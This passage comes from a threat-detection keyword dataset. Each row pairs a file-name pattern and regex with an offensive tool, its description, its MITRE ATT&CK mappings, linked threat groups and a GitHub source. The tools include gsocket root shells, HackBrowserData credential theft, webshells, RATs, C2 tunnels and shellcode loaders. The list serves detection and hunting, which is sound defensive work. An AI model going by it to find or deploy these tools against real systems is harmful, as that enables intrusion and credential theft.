Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7660" "*/gsocket-deb*",".{0,1000}\/gsocket\-deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7661" "*/gsocket-pkg/*",".{0,1000}\/gsocket\-pkg\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7662" "*/gsocket-src*",".{0,1000}\/gsocket\-src.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7663" "*/gsocket-ssl.h*",".{0,1000}\/gsocket\-ssl\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7664" "*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7665" "*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7666" "*/gsocket-util.c*",".{0,1000}\/gsocket\-util\.c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7667" "*/gs-portforward.service*",".{0,1000}\/gs\-portforward\.service.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7668" "*/gs-root-shell.service*",".{0,1000}\/gs\-root\-shell\.service.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7669" "*/gs-sftp*",".{0,1000}\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7670" "*/gtfobin_update.py*",".{0,1000}\/gtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7672" "*/gtfobins.go*",".{0,1000}\/gtfobins\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","7673" "*/gtfobins.py*",".{0,1000}\/gtfobins\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","7674" "*/gtfonow.py*",".{0,1000}\/gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7675" "*/gTunnel.git*",".{0,1000}\/gTunnel\.git.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7676" "*/gTunnel/gtuncli*",".{0,1000}\/gTunnel\/gtuncli.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7677" "*/gtunnel/releases/*",".{0,1000}\/gtunnel\/releases\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - 
T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7678" "*/gtunnel/tarball/*",".{0,1000}\/gtunnel\/tarball\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7679" "*/gtunnel/zipball/*",".{0,1000}\/gtunnel\/zipball\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7680" "*/gtunnel_*.log*",".{0,1000}\/gtunnel_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7681" "*/guervild/BOFs*",".{0,1000}\/guervild\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","7683" "*/guessed_emails.txt*",".{0,1000}\/guessed_emails\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","#linux","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","7684" "*/gyaansastra/CVE-2022-0847*",".{0,1000}\/gyaansastra\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","7685" "*/GzipB64.exe*",".{0,1000}\/GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - 
T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","7686" "*/H Remote Admin Tools.exe*",".{0,1000}\/H\sRemote\sAdmin\sTools\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7687" "*/h4ntu shell [powered by tsoi].php*",".{0,1000}\/h4ntu\sshell\s\[powered\sby\stsoi\]\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7688" "*/h8mail/*",".{0,1000}\/h8mail\/.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","7689" "*/HackBrowserData*",".{0,1000}\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7690" 
"*/hack-browser-data.exe*",".{0,1000}\/hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7691" "*/HackBrowserData.git*",".{0,1000}\/HackBrowserData\.git.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7692" "*/hack-browser-data-linux-386.zip*",".{0,1000}\/hack\-browser\-data\-linux\-386\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7693" "*/hack-browser-data-linux-amd64.zip*",".{0,1000}\/hack\-browser\-data\-linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7694" "*/hack-browser-data-linux-arm.zip*",".{0,1000}\/hack\-browser\-data\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7695" "*/hack-browser-data-linux-arm64.zip*",".{0,1000}\/hack\-browser\-data\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7696" "*/hack-browser-data-osx-64bit.zip*",".{0,1000}\/hack\-browser\-data\-osx\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7697" "*/hack-browser-data-windows-32bit.zip*",".{0,1000}\/hack\-browser\-data\-windows\-32bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7698" 
"*/hack-browser-data-windows-64bit.zip*",".{0,1000}\/hack\-browser\-data\-windows\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7699" "*/hackerid.py*",".{0,1000}\/hackerid\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","7700" "*/hackingtool.git*",".{0,1000}\/hackingtool\.git.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","7701" "*/hackshell.sh*",".{0,1000}\/hackshell\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","7702" "*/Hack-Tools.git*",".{0,1000}\/Hack\-Tools\.git.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - 
T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","7703" "*/Hades.exe*",".{0,1000}\/Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7704" "*/hades.git*",".{0,1000}\/hades\.git.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","7705" "*/HadesLdr.git*",".{0,1000}\/HadesLdr\.git.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","7706" "*/hades-main.zip*",".{0,1000}\/hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","7707" 
"*/hadoop-datanode-info.nse*",".{0,1000}\/hadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7708" "*/hadoop-jobtracker-info.nse*",".{0,1000}\/hadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7709" "*/hadoop-namenode-info.nse*",".{0,1000}\/hadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7710" "*/hadoop-secondary-namenode-info.nse*",".{0,1000}\/hadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7711" "*/hadoop-tasktracker-info.nse*",".{0,1000}\/hadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7712" "*/Hak5.sh*",".{0,1000}\/Hak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","7713" "*/hak5/cc-server/database.Log*",".{0,1000}\/hak5\/cc\-server\/database\.Log.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A","7714" "*/HAKOPS Binder.exe*",".{0,1000}\/HAKOPS\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7715" "*/HAKOPS RAT.exe*",".{0,1000}\/HAKOPS\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7716" "*/hakrawler.git*",".{0,1000}\/hakrawler\.git.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","1","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","7717" "*/hancitor.profile*",".{0,1000}\/hancitor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7718" "*/HandleHijacker.cpp*",".{0,1000}\/HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","7719" "*/HandleHijacker.hpp*",".{0,1000}\/HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense 